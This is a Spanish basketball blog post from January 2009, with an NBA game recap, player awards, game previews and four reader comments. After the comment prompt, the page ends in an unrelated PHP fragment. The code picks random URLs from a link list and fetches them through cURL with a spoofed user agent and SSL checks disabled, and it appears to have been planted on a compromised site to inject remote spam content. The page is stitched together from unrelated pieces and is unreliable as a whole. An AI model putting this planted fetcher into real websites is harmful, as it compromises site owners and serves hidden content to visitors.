La crónica (26/1/2009)

27 de January de 2009 por MagicJohnson32

Proponíamos ayer hacer dos cosas: Primero, evaluar el gran momento de Philadelphia contra los mermados Hornets. Después, seguir a Artest en su visita al Madison. Tanto en un caso como en otro podemos hablar de decepciones.

Por un lado, Chris Paul se merendó a los Sixers a pesar del buen partido de “los André” y de Young. No así de Brand, precisamente quien más hubiera podido desequilibrar la balanza con las bajas de West&Chandler. Si uno creyera en el efecto de la mala suerte podría empezar a pensar que “Mr.20-10” la lleva consigo esta temporada. Su aparición, por corta que sea, en el Box score es sinónimo de derrota… o casi.

Artest, por su parte, se lanzó 19 mandarinas en su partido en New York aunque en esta ocasión le ganó T-Mac con 20, eso sí, con un poco más de tino. Entre los dos, 11 de 39 tiros en un lamentable 25% de acierto. En los Knicks, Nate Robinson y Chandler mostraron una vez más su candidatura a 6º hombre y jugador más mejorado con muy buenas actuaciones saliendo desde el banco. El caso es que D’Antoni todavía lo puede lograr. We believe.

En duelo directo de Playoffs en el Este, “MVP” Flash les dio un buen sobo a los Hawks sin Al Horford. Como se les nota a estos cualquier baja pero, ¿cuándo han sufrido más, sin Josh Smith o sin Horford? En el resto de partidos de zona playoffs los Suns del “gran perro” dieron buena cuenta de Washington y Rudy&Sergio tuvieron una correcta actuación en la victoria de los Blazers frente a los Clippers. Roy, como suele ser habitual en él, fue la estrella del equipo de Oregon.

A Milwaukee es difícil que lo sigamos considerando como equipo de Playoffs después de la baja para lo que resta de temporada de Michael Redd, ahora que empezaba a recuperar las buenas sensaciones. Anoche cascaron contra Minnesotta, lo cual ya está empezando a dejar de ser una deshonra. Lo mismo pasa con los Thunder pero el caso de Vicente&Harris podemos considerarlo como el expediente X de la temporada. ¿Rookie-Wall de veteranos?

PREMIOS

MVP: 27 puntos, 10 rebotes, 15 asistencias, 7 recuperaciones, 1 tapón, 50 de eficiencia. Hoy nadie hizo sombra al gran Chris Paul.

El rookie: Los 18 puntos, con 8 de 13 en tiros, y 7 rebotes le bastaron a Brook Lopez para ser el mejor de su equipo anoche y para llevarse nuestro premio como mejor debutante de la jornada.

La sorpresa: Nos sorprendió la extraordinaria efectividad en el tiro de tres jugadores de los Blazers: Outlaw (8 de 9 en tiros de campo), Oden (7 de 7) y Roy (11 de 15) para un total de 26 de 31. Algo parecido vimos en los Suns, con un 10 de 14 de Shaq, un 9 de 13 de Amaré y un 9 de 14 de Barbosa. Pero la gran sorpresa de la noche la podemos resumir en cinco palabras: 21 puntos de Steve Novak.

La decepción: La pareja Harris-Carter pinchó anoche con un horrible 6 de 29 en tiros de campo. A un nivel semejante estuvio el dúo de los Rockets Artest-McGrady, que hicieron 11 de 39. Aunque peor aún fue lo de Bibby, que hizo 1 de 6 en tiros de campo, 0 de 4 en triples, 0 de 3 en libres, 0 asistencias, 5 pérdidas y 2 puntos.

El mayor esfuerzo en vano: La sección lleva sus nombres. Caron Butler y Antawn Jamison volvieron a hacer todo lo posible para mantener a flote a los Wizards. Entre ambos lograron 55 puntos, 19 rebotes, 6 asistencias y 4 robos, y aun así fue del todo insuficiente para hacer que su equipo sea competitivo.

RAZONES PARA TRASNOCHAR

Entre los cinco partidos que se disputarán durante la madrugada del martes al miércoles, sólo uno enfrenta a dos equipos que disputaron los pasados Playoffs. Es, a priori, el partido más destacado de la noche:

Spurs @ Jazz. Los de Sloan empiezan a pagar las lesiones y la temporada se les pone cada vez más cuesta arriba, con 3 derrotas seguidas y 5 en los últimos 7 partidos. Sin Boozer hasta quién sabe cuándo y con la sombra de una posible operación que mantendría a Kirilenko un mes fuera, todo el peso recae sobre Deron, Okur y Millsap. Esta noche el trío se pondrá a prueba ante unos Spurs que llegan tras el varapalo recibido en el Staples, donde fueron claramente superados por los Lakers. Popovich, ante tal panorama, dio descanso a Parker y Duncan durante todo el último cuarto pensando ya en la visita a Salt Lake City. A partir de las 3:00 veremos si valió la pena.

– El jugador al que vale la pena seguir de cerca esta noche es… Danny Granger. Su equipo visita una de las grandes plazas de la liga, el Amway Arena de Orlando. Los locales están tocados tras dos derrotas seguidas y los Pacers viajan a Florida tras vencer a Rockets y Bobcats. En Granger se acumulan casi todos los motivos para la esperanza por parte de los Pacers de plantar cara a los Magic. A partir de la 1:00 de la noche.

La pregunta que proponemos hoy es… ¿a quién se refería Rafer Alston al acusar a sus compañeros de ser “egoístas” y “vagos” tras la derrota de anoche en el Madison?

Comenta

4 comentarios a esta entrada

  1. Txusma dice:
    #1

    Si el comentario lo hubiera hecho Yao Ming, por ejemplo, a lo mejor respondia que el vago era Alston pero si lo ha dicho él me deja un poco en fuera de juego.
    Por eliminación, Battier siempre se ha caracterizado por darlo todo, Scola como argentino que es no sabe hacer otra cosa, los Landry, Hayes, Von Wafer, Brooks, etc… creo que lo están haciendo bastante bien para el tiempo que les dan, Yao Ming no será, asi que quedan pocos sospechosos… Tal vez los que intentaron más de 18 tiros?

      Citar

  2. MagicJohnson32 dice:
    #2

    ¿A que tiene gracia que sea Alston quien intente poner orden en el equipo? Por lo visto, los últimos minutos fueron lamentables. Tiene toda la pinta de última oportunidad para el proyecto ¿no? Un nuevo batacazo obligaría a cambios radicales. Y ni excusas de lesiones ni leches.

    Ojo a los Jazz, que si AK se ha de operar (aún no han tomado una decisión) los veo fuera de PO’s. Sin él la defensa se resiente muchísimo y la baja de Boozer se notaría aún más.

      Citar

  3. couxe dice:
    #3

    Yo también pienso como Magic, ojito con los Jazz… Sería una verdadera pena que se quedaran fuera de los playoff.
    Eso sí, como vayan al tran tran de aquí al final de temporada, y finalmente entren de ocatvos y lleguen con toda la artillería… Buff… Menuda la que pueden preparar…

      Citar

  4. MagicJohnson32 dice:
    #4

    Hombre, si entran como octavos caerán ante los Lakers. Vamos, no les veo forzándoles más de 5 partidos. Pero a cualquier otro sí que pueden plantarle cara. La cuestión es que no les hemos visto al completo, y me refiero desde la consolidación de Millsap.

    Lo cierto es que el Oeste volverá a dejar eliminatorias de primera ronda preciosas. ¿Un nuevo Spurs-Suns, por ejemplo?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>